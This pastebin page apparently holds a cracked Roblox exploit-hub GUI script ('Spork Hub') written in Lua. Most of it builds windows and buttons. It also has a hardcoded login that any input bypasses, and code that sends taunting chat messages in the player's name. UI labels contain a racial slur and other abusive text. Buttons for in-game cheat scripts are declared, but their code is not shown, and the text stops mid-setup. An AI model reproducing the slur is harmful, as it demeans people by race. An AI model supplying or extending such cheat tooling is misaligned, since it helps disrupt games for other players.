SHOW:
|
|
- or go back to the newest paste.
| 1 | local SporkHub = Instance.new("ScreenGui")
| |
| 2 | local OpenFrame = Instance.new("Frame")
| |
| 3 | local OpenButton = Instance.new("TextButton")
| |
| 4 | local LoginFrame = Instance.new("Frame")
| |
| 5 | local TokenBox = Instance.new("TextBox")
| |
| 6 | local LoginAnime = Instance.new("ImageLabel")
| |
| 7 | local VText = Instance.new("TextLabel")
| |
| 8 | local VPicture = Instance.new("ImageLabel")
| |
| 9 | local LoginButton = Instance.new("TextButton")
| |
| 10 | local UserBox = Instance.new("TextBox")
| |
| 11 | local LoginHeader2 = Instance.new("TextLabel")
| |
| 12 | local LoginHeader1 = Instance.new("TextLabel")
| |
| 13 | local LoginClose = Instance.new("TextButton")
| |
| 14 | local HomeFrame = Instance.new("Frame")
| |
| 15 | local LoginHeader1_2 = Instance.new("TextLabel")
| |
| 16 | local LoginHeader2_2 = Instance.new("TextLabel")
| |
| 17 | local WelcomeTo = Instance.new("TextLabel")
| |
| 18 | local Line1 = Instance.new("TextLabel")
| |
| 19 | local Line2 = Instance.new("TextLabel")
| |
| 20 | local Line3 = Instance.new("TextLabel")
| |
| 21 | local Line4 = Instance.new("TextLabel")
| |
| 22 | local DiscordInv = Instance.new("TextLabel")
| |
| 23 | local Connect = Instance.new("ImageLabel")
| |
| 24 | local Line5 = Instance.new("TextLabel")
| |
| 25 | local Line6 = Instance.new("TextLabel")
| |
| 26 | local Line7 = Instance.new("TextLabel")
| |
| 27 | local ImageLabel = Instance.new("ImageLabel")
| |
| 28 | local REAL = Instance.new("Frame")
| |
| 29 | local Home = Instance.new("TextButton")
| |
| 30 | local Page1 = Instance.new("TextButton")
| |
| 31 | local Page2 = Instance.new("TextButton")
| |
| 32 | local Page3 = Instance.new("TextButton")
| |
| 33 | local Page5 = Instance.new("TextButton")
| |
| 34 | local Page4 = Instance.new("TextButton")
| |
| 35 | local ShowBar = Instance.new("TextButton")
| |
| 36 | local ShowBarPressed = Instance.new("TextButton")
| |
| 37 | local MainHide = Instance.new("TextButton")
| |
| 38 | local MainClose = Instance.new("TextButton")
| |
| 39 | local Page1Frame = Instance.new("Frame")
| |
| 40 | local DTransparent = Instance.new("TextButton")
| |
| 41 | local HTransparent = Instance.new("TextButton")
| |
| 42 | local HMafia = Instance.new("TextButton")
| |
| 43 | local DMafia = Instance.new("TextButton")
| |
| 44 | local ShowCmds = Instance.new("TextButton")
| |
| 45 | local MadeBy = Instance.new("TextLabel")
| |
| 46 | local ComingSoon = Instance.new("TextButton")
| |
| 47 | local Page2Frame = Instance.new("Frame")
| |
| 48 | local DHellSword = Instance.new("TextButton")
| |
| 49 | local SemiShooter = Instance.new("TextButton")
| |
| 50 | local DStaff = Instance.new("TextButton")
| |
| 51 | local DanceDemon = Instance.new("TextButton")
| |
| 52 | local NSign = Instance.new("TextButton")
| |
| 53 | local MadeBy_2 = Instance.new("TextLabel")
| |
| 54 | local ComingSoon_2 = Instance.new("TextButton")
| |
| 55 | local Page3Frame = Instance.new("Frame")
| |
| 56 | local EGirl = Instance.new("TextButton")
| |
| 57 | local MuteRadios = Instance.new("TextButton")
| |
| 58 | local LoudBoom = Instance.new("TextButton")
| |
| 59 | local XMas = Instance.new("TextButton")
| |
| 60 | local ComingSoon_3 = Instance.new("TextButton")
| |
| 61 | local MadeBy_3 = Instance.new("TextLabel")
| |
| 62 | local ComingSoon_4 = Instance.new("TextButton")
| |
| 63 | local IntroFrame = Instance.new("Frame")
| |
| 64 | local ImageLabel_2 = Instance.new("ImageLabel")
| |
| 65 | local NWhitelistFrame = Instance.new("Frame")
| |
| 66 | local NotHeader = Instance.new("TextLabel")
| |
| 67 | local NotHeader2 = Instance.new("TextLabel")
| |
| 68 | local ImageLabel_3 = Instance.new("ImageLabel")
| |
| 69 | local Note = Instance.new("TextLabel")
| |
| 70 | local Note2 = Instance.new("TextLabel")
| |
| 71 | local TextLabel = Instance.new("TextLabel")
| |
| 72 | --Properties: | |
| 73 | SporkHub.Name = "Spork Hub" | |
| 74 | SporkHub.Parent = game.CoreGui | |
| 75 | OpenFrame.Name = "OpenFrame" | |
| 76 | OpenFrame.Parent = SporkHub | |
| 77 | OpenFrame.BackgroundColor3 = Color3.new(0.176471, 0.176471, 0.176471) | |
| 78 | OpenFrame.BorderColor3 = Color3.new(1, 0, 0.498039) | |
| 79 | OpenFrame.Position = UDim2.new(0, 0, 0.366220742, 0) | |
| 80 | OpenFrame.Size = UDim2.new(0, 138, 0, 63) | |
| 81 | OpenFrame.Visible = false | |
| 82 | OpenButton.Name = "OpenButton" | |
| 83 | OpenButton.Parent = OpenFrame | |
| 84 | OpenButton.BackgroundColor3 = Color3.new(1, 1, 1) | |
| 85 | OpenButton.BackgroundTransparency = 1 | |
| 86 | OpenButton.Size = UDim2.new(0, 138, 0, 63) | |
| 87 | OpenButton.Font = Enum.Font.SourceSans | |
| 88 | OpenButton.Text = "Open" OpenButton.TextColor3 = | |
| 89 | Color3.new(1, 0, 0.498039) | |
| 90 | OpenButton.TextSize = 28 | |
| 91 | OpenButton.MouseButton1Down:connect(function() | |
| 92 | HomeFrame.Visible = true | |
| 93 | OpenFrame.Visible = false | |
| 94 | end) | |
| 95 | LoginFrame.Name = "Login Frame" | |
| 96 | LoginFrame.Parent = SporkHub | |
| 97 | LoginFrame.BackgroundColor3 = Color3.new(0.176471, 0.176471, 0.176471) | |
| 98 | LoginFrame.BorderColor3 = Color3.new(0.176471, 0.176471, 0.176471) | |
| 99 | LoginFrame.Position = UDim2.new(0.379999995, 0, -0.582000017, 0) | |
| 100 | LoginFrame.Size = UDim2.new(0, 370, 0, 282) | |
| 101 | LoginFrame.Active = true | |
| 102 | LoginFrame.Selectable = true | |
| 103 | LoginFrame.Draggable = true | |
| 104 | TokenBox.Name = "TokenBox" | |
| 105 | TokenBox.Parent = LoginFrame | |
| 106 | TokenBox.BackgroundColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 107 | TokenBox.BorderColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 108 | TokenBox.Position = UDim2.new(0.23976317, 0, 0.44745326, 0) | |
| 109 | TokenBox.Size = UDim2.new(0, 200, 0, 50) | |
| 110 | TokenBox.Font = Enum.Font.SourceSans | |
| 111 | TokenBox.Text = "Token:" | |
| 112 | TokenBox.TextColor3 = Color3.new(1, 1, 1) | |
| 113 | TokenBox.TextSize = 27 | |
| 114 | LoginAnime.Name = "LoginAnime" | |
| 115 | LoginAnime.Parent = LoginFrame | |
| 116 | LoginAnime.BackgroundColor3 = Color3.new(1, 1, 1) | |
| 117 | LoginAnime.BackgroundTransparency = 1 | |
| 118 | LoginAnime.Position = UDim2.new(0.0207905583, 0, 0.117021278, 0) | |
| 119 | LoginAnime.Size = UDim2.new(0, 102, 0, 106) | |
| 120 | LoginAnime.Image = "rbxassetid://988095607" | |
| 121 | VText.Name = "VText" | |
| 122 | VText.Parent = LoginFrame | |
| 123 | VText.BackgroundColor3 = Color3.new(1, 1, 1) | |
| 124 | VText.BackgroundTransparency = 1 | |
| 125 | VText.Position = UDim2.new(0.138060063, 0, 0.931219518, 0) | |
| 126 | VText.Size = UDim2.new(0, 170, 0, 19) | |
| 127 | VText.Font = Enum.Font.SourceSans | |
| 128 | VText.Text = "V.1 Made by a fucking nigger" | |
| 129 | VText.TextColor3 = Color3.new(1, 1, 1) | |
| 130 | VText.TextSize = 14 VPicture.Name = "VPicture" | |
| 131 | VPicture.Parent = LoginFrame | |
| 132 | VPicture.BackgroundColor3 = Color3.new(1, 1, 1) | |
| 133 | VPicture.BackgroundTransparency = 1 | |
| 134 | VPicture.Position = UDim2.new(0, 0, 0.912337661, 0) | |
| 135 | VPicture.Size = UDim2.new(0, 27, 0, 27) | |
| 136 | VPicture.Image = "rbxassetid://1417277226" | |
| 137 | LoginButton.Name = "LoginButton" | |
| 138 | LoginButton.Parent = LoginFrame | |
| 139 | LoginButton.BackgroundColor3 = Color3.new(1, 0, 0.498039) | |
| 140 | LoginButton.BorderColor3 = Color3.new(0.176471, 0.176471, 0.176471) | |
| 141 | LoginButton.Position = UDim2.new(0.23976317, 0, 0.710140944, 0) | |
| 142 | LoginButton.Size = UDim2.new(0, 200, 0, 28) | |
| 143 | LoginButton.Font = Enum.Font.SourceSans | |
| 144 | LoginButton.Text = "Login (no need for name)" | |
| 145 | LoginButton.TextColor3 = Color3.new(0, 0, 0) | |
| 146 | LoginButton.TextSize = 17 | |
| 147 | LoginButton.MouseButton1Down:connect(function() | |
| 148 | if UserBox.Text == "spork" and TokenBox.Text == "LilTomas14" then | |
| 149 | game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("Hello bad Owner!, not Loading SporkHub...","all")
| |
| 150 | wait(3.0) | |
| 151 | game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("You suck!","all")
| |
| 152 | wait(1.0) | |
| 153 | LoginFrame.Visible = false | |
| 154 | OpenFrame.Visible = false | |
| 155 | elseif UserBox.Text == UserBox.Text and TokenBox.Text == TokenBox.Text then | |
| 156 | game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("Hello Cracker! Made by some fat dude who lives in his moms basement.","all")
| |
| 157 | game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("Cracked by Cool_show#0001, Loading free SporkHub...","all")
| |
| 158 | wait(3.0) | |
| 159 | game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("SporkHub sucks!","all")
| |
| 160 | wait(1.0) | |
| 161 | LoginFrame.Visible = false | |
| 162 | OpenFrame.Visible = true | |
| 163 | else | |
| 164 | UserBox.Name = "User" | |
| 165 | UserBox.Parent = LoginFrame | |
| 166 | UserBox.Text = "How in the fuck?!" | |
| 167 | TokenBox.Text = "HOW DID YOU FAIL THE LOGIN?!" | |
| 168 | end | |
| 169 | end) | |
| 170 | UserBox.Name = "UserBox" | |
| 171 | UserBox.Parent = LoginFrame | |
| 172 | UserBox.BackgroundColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 173 | UserBox.BorderColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 174 | UserBox.Position = UDim2.new(0.23976317, 0, 0.217532471, 0) | |
| 175 | UserBox.Size = UDim2.new(0, 200, 0, 50) | |
| 176 | UserBox.Font = Enum.Font.SourceSans | |
| 177 | UserBox.Text = "User:" | |
| 178 | UserBox.TextColor3 = Color3.new(1, 1, 1) | |
| 179 | UserBox.TextSize = 27 | |
| 180 | LoginHeader2.Name = "LoginHeader2" | |
| 181 | LoginHeader2.Parent = LoginFrame | |
| 182 | LoginHeader2.BackgroundColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 183 | LoginHeader2.BorderColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 184 | LoginHeader2.Size = UDim2.new(0, 370, 0, 30) | |
| 185 | LoginHeader2.Font = Enum.Font.SourceSans | |
| 186 | LoginHeader2.Text = " Hub" | |
| 187 | LoginHeader2.TextColor3 = Color3.new(1, 0, 0.498039) | |
| 188 | LoginHeader2.TextSize = 26 | |
| 189 | LoginHeader1.Name = "LoginHeader1" | |
| 190 | LoginHeader1.Parent = LoginFrame | |
| 191 | LoginHeader1.BackgroundColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 192 | LoginHeader1.BackgroundTransparency = 1 | |
| 193 | LoginHeader1.BorderColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 194 | LoginHeader1.Size = UDim2.new(0, 370, 0, 30) | |
| 195 | LoginHeader1.Font = Enum.Font.SourceSans | |
| 196 | LoginHeader1.Text = "Spork " | |
| 197 | LoginHeader1.TextColor3 = Color3.new(1, 1, 1) | |
| 198 | LoginHeader1.TextSize = 26 | |
| 199 | LoginClose.Name = "LoginClose" | |
| 200 | LoginClose.Parent = LoginFrame | |
| 201 | LoginClose.BackgroundColor3 = Color3.new(1, 1, 1) | |
| 202 | LoginClose.BackgroundTransparency = 1 | |
| 203 | LoginClose.Position = UDim2.new(0.908108115, 0, 0, 0) | |
| 204 | LoginClose.Size = UDim2.new(0, 34, 0, 30) | |
| 205 | LoginClose.Font = Enum.Font.SourceSans | |
| 206 | LoginClose.Text = "X" | |
| 207 | LoginClose.TextColor3 = Color3.new(1, 0, 0.498039) | |
| 208 | LoginClose.TextSize = 22 | |
| 209 | LoginClose.MouseButton1Down:connect(function() | |
| 210 | LoginFrame.Visible = false | |
| 211 | HomeFrame.Visible = false | |
| 212 | OpenFrame.Visible = false | |
| 213 | IntroFrame.Visible = false | |
| 214 | end) | |
| 215 | HomeFrame.Name = "HomeFrame" | |
| 216 | HomeFrame.Parent = SporkHub | |
| 217 | HomeFrame.BackgroundColor3 = Color3.new(0.176471, 0.176471, 0.176471) | |
| 218 | HomeFrame.BorderColor3 = Color3.new(0.176471, 0.176471, 0.176471) | |
| 219 | HomeFrame.Position = UDim2.new(0.232222229, 0, 0.229096994, 0) | |
| 220 | HomeFrame.Size = UDim2.new(0, 525, 0, 263) | |
| 221 | HomeFrame.Active = true | |
| 222 | HomeFrame.Selectable = true | |
| 223 | HomeFrame.Draggable = true | |
| 224 | HomeFrame.Visible = false | |
| 225 | LoginHeader1_2.Name = "LoginHeader1" | |
| 226 | LoginHeader1_2.Parent = HomeFrame | |
| 227 | LoginHeader1_2.BackgroundColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 228 | LoginHeader1_2.BorderColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 229 | LoginHeader1_2.Size = UDim2.new(0, 525, 0, 30) | |
| 230 | LoginHeader1_2.Font = Enum.Font.SourceSans | |
| 231 | LoginHeader1_2.Text = "Spork " | |
| 232 | LoginHeader1_2.TextColor3 = Color3.new(1, 1, 1) | |
| 233 | LoginHeader1_2.TextSize = 26 | |
| 234 | LoginHeader2_2.Name = "LoginHeader2" | |
| 235 | LoginHeader2_2.Parent = HomeFrame | |
| 236 | LoginHeader2_2.BackgroundColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 237 | LoginHeader2_2.BackgroundTransparency = 1 | |
| 238 | LoginHeader2_2.BorderColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 239 | LoginHeader2_2.Size = UDim2.new(0, 525, 0, 30) | |
| 240 | LoginHeader2_2.Font = Enum.Font.SourceSans | |
| 241 | LoginHeader2_2.Text = " Hub" | |
| 242 | LoginHeader2_2.TextColor3 = Color3.new(1, 0, 0.498039) | |
| 243 | LoginHeader2_2.TextSize = 26 | |
| 244 | WelcomeTo.Name = "WelcomeTo!" | |
| 245 | WelcomeTo.Parent = HomeFrame | |
| 246 | WelcomeTo.BackgroundColor3 = Color3.new(1, 1, 1) | |
| 247 | WelcomeTo.BackgroundTransparency = 1 | |
| 248 | WelcomeTo.Position = UDim2.new(0.483809531, 0, 0.114068441, 0) | |
| 249 | WelcomeTo.Size = UDim2.new(0, 270, 0, 50) | |
| 250 | WelcomeTo.Font = Enum.Font.SourceSans | |
| 251 | WelcomeTo.Text = "Welcome to Spork Hub! " | |
| 252 | WelcomeTo.TextColor3 = Color3.new(1, 1, 1) | |
| 253 | WelcomeTo.TextSize = 30 | |
| 254 | Line1.Name = "Line1" | |
| 255 | Line1.Parent = HomeFrame | |
| 256 | Line1.BackgroundColor3 = Color3.new(1, 1, 1) | |
| 257 | Line1.BackgroundTransparency = 1 Line1.Position = | |
| 258 | UDim2.new(-0.00174817443, 0, 0.266159683, 0) | |
| 259 | Line1.Size = UDim2.new(0, 340, 0, 32) | |
| 260 | Line1.Font = Enum.Font.SourceSans | |
| 261 | Line1.Text = "This FE Gui was designed by a cunt!" | |
| 262 | Line1.TextColor3 = Color3.new(1, 1, 1) | |
| 263 | Line1.TextSize = 20 | |
| 264 | Line2.Name = "Line2" | |
| 265 | Line2.Parent = HomeFrame | |
| 266 | Line2.BackgroundColor3 = Color3.new(1, 1, 1) | |
| 267 | Line2.BackgroundTransparency = 1 | |
| 268 | Line2.Position = UDim2.new(-0.00174817443, 0, 0.387832701, 0) | |
| 269 | Line2.Size = UDim2.new(0, 340, 0, 23) | |
| 270 | Line2.Font = Enum.Font.SourceSans | |
| 271 | Line2.Text = "AKA fuck" | |
| 272 | Line2.TextColor3 = Color3.new(1, 1, 1) | |
| 273 | Line2.TextSize = 20 | |
| 274 | Line3.Name = "Line3" | |
| 275 | Line3.Parent = HomeFrame | |
| 276 | Line3.BackgroundColor3 = Color3.new(1, 1, 1) | |
| 277 | Line3.BackgroundTransparency = 1 | |
| 278 | Line3.Position = UDim2.new(-0.00174817443, 0, 0.475285172, 0) | |
| 279 | Line3.Size = UDim2.new(0, 340, 0, 32) | |
| 280 | Line3.Font = Enum.Font.SourceSans | |
| 281 | Line3.Text = "Shoutout to 4zyg for some of the scripts!" | |
| 282 | Line3.TextColor3 = Color3.new(1, 1, 1) | |
| 283 | Line3.TextSize = 20 | |
| 284 | Line4.Name = "Line4" | |
| 285 | Line4.Parent = HomeFrame | |
| 286 | Line4.BackgroundColor3 = Color3.new(1, 1, 1) | |
| 287 | Line4.BackgroundTransparency = 1 | |
| 288 | Line4.Position = UDim2.new(-0.00174817443, 0, 0.60076046, 0) | |
| 289 | Line4.Size = UDim2.new(0, 340, 0, 32) | |
| 290 | Line4.Font = Enum.Font.SourceSans | |
| 291 | Line4.Text = "Thank you for 'buying' and" | |
| 292 | Line4.TextColor3 = Color3.new(1, 1, 1) | |
| 293 | Line4.TextSize = 20 | |
| 294 | DiscordInv.Name = "DiscordInv" | |
| 295 | DiscordInv.Parent = HomeFrame | |
| 296 | DiscordInv.BackgroundColor3 = Color3.new(1, 1, 1) | |
| 297 | DiscordInv.BackgroundTransparency = 1 | |
| 298 | DiscordInv.Position = UDim2.new(0.156347066, 0, 0.844106436, 0) | |
| 299 | DiscordInv.Size = UDim2.new(0, 219, 0, 32) | |
| 300 | DiscordInv.Font = Enum.Font.SourceSans | |
| 301 | DiscordInv.Text = "https://discord.gg/fuckoff" | |
| 302 | DiscordInv.TextColor3 = Color3.new(1, 0, 0.498039) | |
| 303 | DiscordInv.TextSize = 20 | |
| 304 | Connect.Name = "Connect" | |
| 305 | Connect.Parent = HomeFrame | |
| 306 | Connect.BackgroundColor3 = Color3.new(1, 1, 1) | |
| 307 | Connect.BackgroundTransparency = 1 | |
| 308 | Connect.Position = UDim2.new(0.12190479, 0, 0.863117814, 0) | |
| 309 | Connect.Size = UDim2.new(0, 26, 0, 21) | |
| 310 | Connect.Image = "rbxassetid://1030533835" | |
| 311 | Line5.Name = "Line5" | |
| 312 | Line5.Parent = HomeFrame | |
| 313 | Line5.BackgroundColor3 = Color3.new(1, 1, 1) | |
| 314 | Line5.BackgroundTransparency = 1 | |
| 315 | Line5.Position = UDim2.new(-0.00174817443, 0, 0.722433448, 0) | |
| 316 | Line5.Size = UDim2.new(0, 340, 0, 32) | |
| 317 | Line5.Font = Enum.Font.SourceSans | |
| 318 | Line5.Text = "have fun with this GUI I designed!" | |
| 319 | Line5.TextColor3 = Color3.new(1, 1, 1) | |
| 320 | Line5.TextSize = 20 | |
| 321 | Line6.Name = "Line6" | |
| 322 | Line6.Parent = HomeFrame | |
| 323 | Line6.BackgroundColor3 = Color3.new(1, 1, 1) | |
| 324 | Line6.BackgroundTransparency = 1 | |
| 325 | Line6.Position = UDim2.new(0.61523813, 0, 0.737642646, 0) | |
| 326 | Line6.Size = UDim2.new(0, 131, 0, 24) | |
| 327 | Line6.Font = Enum.Font.SourceSans | |
| 328 | Line6.Text = "Please share the discord link" | |
| 329 | Line6.TextColor3 = Color3.new(1, 1, 1) | |
| 330 | Line6.TextSize = 20 | |
| 331 | Line7.Name = "Line7" | |
| 332 | Line7.Parent = HomeFrame | |
| 333 | Line7.BackgroundColor3 = Color3.new(1, 1, 1) | |
| 334 | Line7.BackgroundTransparency = 1 | |
| 335 | Line7.Position = UDim2.new(0.61523813, 0, 0.844106555, 0) | |
| 336 | Line7.Size = UDim2.new(0, 131, 0, 24) | |
| 337 | Line7.Font = Enum.Font.SourceSans | |
| 338 | Line7.Text = "with friends!!" | |
| 339 | Line7.TextColor3 = Color3.new(1, 1, 1) | |
| 340 | Line7.TextSize = 20 | |
| 341 | ImageLabel.Parent = HomeFrame | |
| 342 | ImageLabel.BackgroundColor3 = Color3.new(1, 1, 1) | |
| 343 | ImageLabel.BackgroundTransparency = 1 | |
| 344 | ImageLabel.Position = UDim2.new(0.702857137, 0, 0.3041825, 0) | |
| 345 | ImageLabel.Size = UDim2.new(0, 100, 0, 100) | |
| 346 | ImageLabel.Image = "rbxassetid://1593849273" | |
| 347 | REAL.Name = "REAL" | |
| 348 | REAL.Parent = HomeFrame | |
| 349 | REAL.BackgroundColor3 = Color3.new(0.176471, 0.176471, 0.176471) | |
| 350 | REAL.BorderColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 351 | REAL.Position = UDim2.new(0, 0, 1.89999998, 0) | |
| 352 | REAL.Size = UDim2.new(0, 525, 0, 82) | |
| 353 | REAL.Visible = false | |
| 354 | Home.Name = "Home" | |
| 355 | Home.Parent = REAL | |
| 356 | Home.BackgroundColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 357 | Home.BorderColor3 = Color3.new(1, 0, 0.498039) | |
| 358 | Home.Position = UDim2.new(0.016863199, 0, 0.133436248, 0) | |
| 359 | Home.Size = UDim2.new(0, 151, 0, 23) | |
| 360 | Home.Font = Enum.Font.SourceSans | |
| 361 | Home.Text = "Home" | |
| 362 | Home.TextColor3 = Color3.new(1, 1, 1) | |
| 363 | Home.TextSize = 22 | |
| 364 | Home.MouseButton1Down:connect(function() | |
| 365 | Page1Frame.Visible = false | |
| 366 | Page2Frame.Visible = false | |
| 367 | Page3Frame.Visible = false | |
| 368 | HomeFrame.Visible = true | |
| 369 | end) | |
| 370 | Page1.Name = "Page1" | |
| 371 | Page1.Parent = REAL | |
| 372 | Page1.BackgroundColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 373 | Page1.BorderColor3 = Color3.new(1, 0, 0.498039) | |
| 374 | Page1.Position = UDim2.new(0.355910838, 0, 0.129359335, 0) | |
| 375 | Page1.Size = UDim2.new(0, 151, 0, 23) | |
| 376 | Page1.Font = Enum.Font.SourceSans | |
| 377 | Page1.Text = "Page1" | |
| 378 | Page1.TextColor3 = Color3.new(1, 1, 1) | |
| 379 | Page1.TextSize = 22 | |
| 380 | Page1.MouseButton1Down:connect(function() | |
| 381 | Page2Frame.Visible = false | |
| 382 | Page3Frame.Visible = false | |
| 383 | Page1Frame.Visible = true | |
| 384 | end) | |
| 385 | Page2.Name = "Page2" | |
| 386 | Page2.Parent = REAL | |
| 387 | Page2.BackgroundColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 388 | Page2.BorderColor3 = Color3.new(1, 0, 0.498039) | |
| 389 | Page2.Position = UDim2.new(0.685434639, 0, 0.121480346, 0) | |
| 390 | Page2.Size = UDim2.new(0, 151, 0, 23) | |
| 391 | Page2.Font = Enum.Font.SourceSans | |
| 392 | Page2.Text = "Page2" | |
| 393 | Page2.TextColor3 = Color3.new(1, 1, 1) | |
| 394 | Page2.TextSize = 22 | |
| 395 | Page2.MouseButton1Down:connect(function() | |
| 396 | Page1Frame.Visible = false | |
| 397 | Page3Frame.Visible = false | |
| 398 | Page2Frame.Visible = true | |
| 399 | end) | |
| 400 | Page3.Name = "Page3" | |
| 401 | Page3.Parent = REAL | |
| 402 | Page3.BackgroundColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 403 | Page3.BorderColor3 = Color3.new(1, 0, 0.498039) | |
| 404 | Page3.Position = UDim2.new(0.0168632008, 0, 0.569676459, 0) | |
| 405 | Page3.Size = UDim2.new(0, 151, 0, 23) | |
| 406 | Page3.Font = Enum.Font.SourceSans | |
| 407 | Page3.Text = "Page3" | |
| 408 | Page3.TextColor3 = Color3.new(1, 1, 1) | |
| 409 | Page3.TextSize = 22 | |
| 410 | Page3.MouseButton1Down:connect(function() | |
| 411 | Page1Frame.Visible = false | |
| 412 | Page2Frame.Visible = false | |
| 413 | Page3Frame.Visible = true | |
| 414 | end) | |
| 415 | Page5.Name = "Page5" | |
| 416 | Page5.Parent = REAL | |
| 417 | Page5.BackgroundColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 418 | Page5.BorderColor3 = Color3.new(1, 0, 0.498039) | |
| 419 | Page5.Position = UDim2.new(0.68543458, 0, 0.558508515, 0) | |
| 420 | Page5.Size = UDim2.new(0, 151, 0, 23) | |
| 421 | Page5.Font = Enum.Font.SourceSans | |
| 422 | Page5.Text = "Coming Soon..." | |
| 423 | Page5.TextColor3 = Color3.new(1, 1, 1) | |
| 424 | Page5.TextSize = 22 | |
| 425 | Page4.Name = "Page4" | |
| 426 | Page4.Parent = REAL | |
| 427 | Page4.BackgroundColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 428 | Page4.BorderColor3 = Color3.new(1, 0, 0.498039) | |
| 429 | Page4.Position = UDim2.new(0.355272442, 0, 0.568236768, 0) | |
| 430 | Page4.Size = UDim2.new(0, 151, 0, 23) | |
| 431 | Page4.Font = Enum.Font.SourceSans | |
| 432 | Page4.Text = "Coming Soon..." | |
| 433 | Page4.TextColor3 = Color3.new(1, 1, 1) | |
| 434 | Page4.TextSize = 22 | |
| 435 | ShowBar.Name = "ShowBar" | |
| 436 | ShowBar.Parent = HomeFrame | |
| 437 | ShowBar.BackgroundColor3 = Color3.new(0.137255, 0.137255, 0.137255) | |
| 438 | ShowBar.BorderColor3 = Color3.new(0.176471, 0.176471, 0.176471) | |
| 439 | ShowBar.Position = UDim2.new(0, 0, 0.140684411, 0) | |
| 440 | ShowBar.Size = UDim2.new(0, 34, 0, 33) | |
| 441 | ShowBar.Font = Enum.Font.SourceSans ShowBar.Text = "âš™ï¸" | |
| 442 | ShowBar.TextColor3 = Color3.new(0, 0, 0) | |
| 443 | ShowBar.TextSize = 24 | |
| 444 | ShowBar.MouseButton1Down:connect(function() | |
| 445 | REAL.Visible = true | |
| 446 | ShowBar.Visible = false | |
| 447 | ShowBarPressed.Visible = true | |
| 448 | end) | |
| 449 | ShowBarPressed.Name = "ShowBarPressed" | |
| 450 | ShowBarPressed.Parent = HomeFrame | |
| 451 | ShowBarPressed.BackgroundColor3 = Color3.new(1, 0, 0.498039) | |
| 452 | ShowBarPressed.BorderColor3 = Color3.new(1, 0, 0.498039) | |
| 453 | ShowBarPressed.Position = UDim2.new(0, 0, 0.140684411, 0) | |
| 454 | ShowBarPressed.Size = UDim2.new(0, 34, 0, 33) | |
| 455 | ShowBarPressed.Font = Enum.Font.SourceSans | |
| 456 | ShowBarPressed.Text = "âš™ï¸" | |
| 457 | ShowBarPressed.TextColor3 = Color3.new(0, 0, 0) | |
| 458 | ShowBarPressed.TextSize = 24 | |
| 459 | ShowBarPressed.Visible = false | |
| 460 | ShowBarPressed.MouseButton1Down:connect(function() | |
| 461 | REAL.Visible = false | |
| 462 | REAL.Position = UDim2.new(0, 0, 1.89999998, 0) | |
| 463 | ShowBar.Visible = true | |
| 464 | ShowBarPressed.Visible = false | |
| 465 | end) | |
| 466 | MainHide.Name = "MainHide" | |
| 467 | MainHide.Parent = HomeFrame | |
| 468 | MainHide.BackgroundColor3 = Color3.new(1, 1, 1) | |
| 469 | MainHide.BackgroundTransparency = 1 | |
| 470 | MainHide.Position = UDim2.new(0.870012879, 0, 0, 0) | |
| 471 | MainHide.Size = UDim2.new(0, 34, 0, 30) | |
| 472 | MainHide.Font = Enum.Font.SourceSans | |
| 473 | MainHide.Text = "-" | |
| 474 | MainHide.TextColor3 = Color3.new(1, 0, 0.498039) | |
| 475 | MainHide.TextSize = 22 | |
| 476 | MainHide.MouseButton1Down:connect(function() | |
| 477 | HomeFrame.Visible = false | |
| 478 | OpenFrame.Visible = true | |
| 479 | end) | |
| 480 | MainClose.Name = "MainClose" | |
| 481 | MainClose.Parent = HomeFrame | |
| 482 | MainClose.BackgroundColor3 = Color3.new(1, 1, 1) | |
| 483 | MainClose.BackgroundTransparency = 1 | |
| 484 | MainClose.Position = UDim2.new(0.934774816, 0, 0, 0) | |
| 485 | MainClose.Size = UDim2.new(0, 34, 0, 30) | |
| 486 | MainClose.Font = Enum.Font.SourceSans | |
| 487 | MainClose.Text = "X" | |
| 488 | MainClose.TextColor3 = Color3.new(1, 0, 0.498039) | |
| 489 | MainClose.TextSize = 22 | |
| 490 | MainClose.MouseButton1Down:connect(function() | |
| 491 | HomeFrame.Visible = false | |
| 492 | OpenFrame.Visible = false | |
| 493 | Page1Frame.Visible = false | |
| 494 | Page2Frame.Visible = false | |
| 495 | Page3Frame.Visible = false | |
| 496 | end) | |
| 497 | Page1Frame.Name = "Page1Frame" | |
| 498 | Page1Frame.Parent = HomeFrame | |
| 499 | Page1Frame.BackgroundColor3 = Color3.new(0.176471, 0.176471, 0.176471) | |
| 500 | Page1Frame.BorderColor3 = Color3.new(0.176471, 0.176471, 0.176471) | |
| 501 | Page1Frame.Position = UDim2.new(-0.00031744095, 0, 0.112781018, 0) | |
| 502 | Page1Frame.Size = UDim2.new(0, 525, 0, 234) | |
| 503 | Page1Frame.Visible = false | |
| 504 | DTransparent.Name = "DTransparent" | |
| 505 | DTransparent.Parent = Page1Frame | |
| 506 | DTransparent.BackgroundColor3 = Color3.new(1, 0, 0.498039) | |
| 507 | DTransparent.BorderColor3 = Color3.new(1, 0, 0.498039) | |
| 508 | DTransparent.Position = UDim2.new(0.040076334, 0, 0.0470085479, 0) | |
| 509 | DTransparent.Size = UDim2.new(0, 200, 0, 50) | |
| 510 | DTransparent.Font = Enum.Font.SourceSans | |
